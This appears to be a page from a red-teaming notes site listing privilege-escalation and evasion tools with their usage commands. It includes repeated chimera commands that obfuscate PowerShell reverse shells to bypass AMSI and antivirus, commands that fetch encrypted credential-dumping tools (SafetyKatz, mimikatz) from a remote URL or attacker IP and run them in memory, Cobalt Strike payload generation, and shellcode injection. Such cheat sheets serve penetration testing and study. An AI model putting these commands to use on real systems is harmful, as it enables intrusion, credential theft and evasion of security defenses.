Red Teaming and Malware Analysis
Red Teaming and Malware Analysis
@sirpedrotavares
seguranca-informatica.pt
0xSI_f33d
About
Red Teaming
Cheat Sheet
Active Directory 101
Fuzzing and Web
Initial Foothold
Privilege Escalation (Privesc)
Lateral Movement (Pivoting)
Persistence
Command and Control (C&C)
Data Exfiltration
CVE & Exploits / CTF
Tools
OSINT
DNS
WEB
Infrastructure and Network
Privilege Escalation
Exfiltration
Persistence
Password & Cracking
Static Code Analysis
Reporting
Resources
Malware Analysis
Unpacking
Tools
Resources
Mobile
Tools
Android Dynamic Analysis
IoT / ARM
Reverse IoT devices
Tools
Resources
Powered by GitBook

Privilege Escalation

​CrossC2: generate CobaltStrike's cross-platform payload.

/genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux x86 ./cross

TheFatRat: TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

​traitor: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins.

Windows

DKMC: Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final shellcode payload.

darkarmour: Store and execute an encrypted windows binary from inside memory, without a single bit touching disk.

./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5

​donut: Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.

​chimera: Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e
​
# "cmd.exe" isn't a data type but when wrapped in double-quotes, this works
# https://www.sparknotes.com/lit/harrypotter/section1/
./chimera.sh -f shells/generic1.ps1 -l 2 -o /tmp/chimera.ps1 -v -t cmd.exe -c /tmp/harry_potter.txt -i -h -s getstream -b new-object -j -g -k -r -p
​
./chimera.sh -f shells/generic2.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s excePTIon.InneRexcePTIon.message,getstream -b invoke-expression,new-object -j -g -k -r -p
​
./chimera.sh -f shells/generic3.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s equals,split,getstream -b new-object -j -g -k -r -p
​
# short strings like `-s pwd` are prone to breaking scrips
./chimera.sh -f shells/powershell_reverse_shell.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,close,pwd,ascii,write -b iex,out-string,new-object -j -g -k -r -p
​
# nishang scripts
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r -p
./chimera.sh -f shells/Invoke-PowerShellTcpOneLine.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,read -b while,new-object,iex -j -g -k -r -p

​Invoke-Stealth: This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques.

​BetterXencrypt: A better version of Xencrypt.Xencrypt it self is a Powershell runtime crypter designed to evade AVs.

Encrypt C# file:
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc
​
Only full paths to the file are accepted at this point. The encrypted files generated by Invoke-SharpEncrypt can then be hosted on a web server on the Internet or stored on the target system on disk. Invoke-SharpLoader can be used to decrypt and execute the files in memory. Two examples demonstrate how to load a file from a remote webserver or from disk.
​
Load from URL:
Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs
​
Load from DISK:
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"
Import-Module ./betterxencrypt.ps1
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

​Invoke-SharpLoader: Load encrypted and compressed C# Code from a remote Webserver or from a local file straight to memory and execute it there.

​PEASS: Privilege Escalation Awesome Scripts SUITE.

​deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE).

​unicorn: Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500

​ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.

Before.
After.

​PowerSploit: PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

powershell Invoke-WebRequest http://10.10.14.14/PowerUp.ps1 -OutFile PowerUp.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

Powerless: Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind.

Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities.

C:\> Watson.exe
  __    __      _
 / / /\ \ \__ _| |_ ___  ___  _ __
 \ \/  \/ / _` | __/ __|/ _ \| '_ \
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
​
                           v2.0
​
                   @_RastaMouse
​
 [*] OS Build Number: 14393
 [*] Enumerating installed KBs...
​
 [!] CVE-2019-0836 : VULNERABLE
  [>] https://exploit-db.com/exploits/46718
  [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
​
 [!] CVE-2019-0841 : VULNERABLE
  [>] https://github.com/rogue-kdc/CVE-2019-0841
  [>] https://rastamouse.me/tags/cve-2019-0841/
​
 [!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/
​
 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

JAWS: JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.

​AccessChk: Find misconfigured services.

accesschk.exe /accepteula
accesschk "power users" c:\windows\system32
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

​MineSweeper: Windows user-land hooks manipulation tool.

​pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).

​hollows_hunter: Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

Linux

​gtfobins.github.io: GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

​LinEnum: Linux sh script for privesc.

/LinEnum.sh -s -k keyword -r report -e /tmp/ -t

pspy: unprivileged Linux process snooping.

​

Previous
Powershell
Next
Exfiltration
Last updated 2 months ago
Contents
Windows
Linux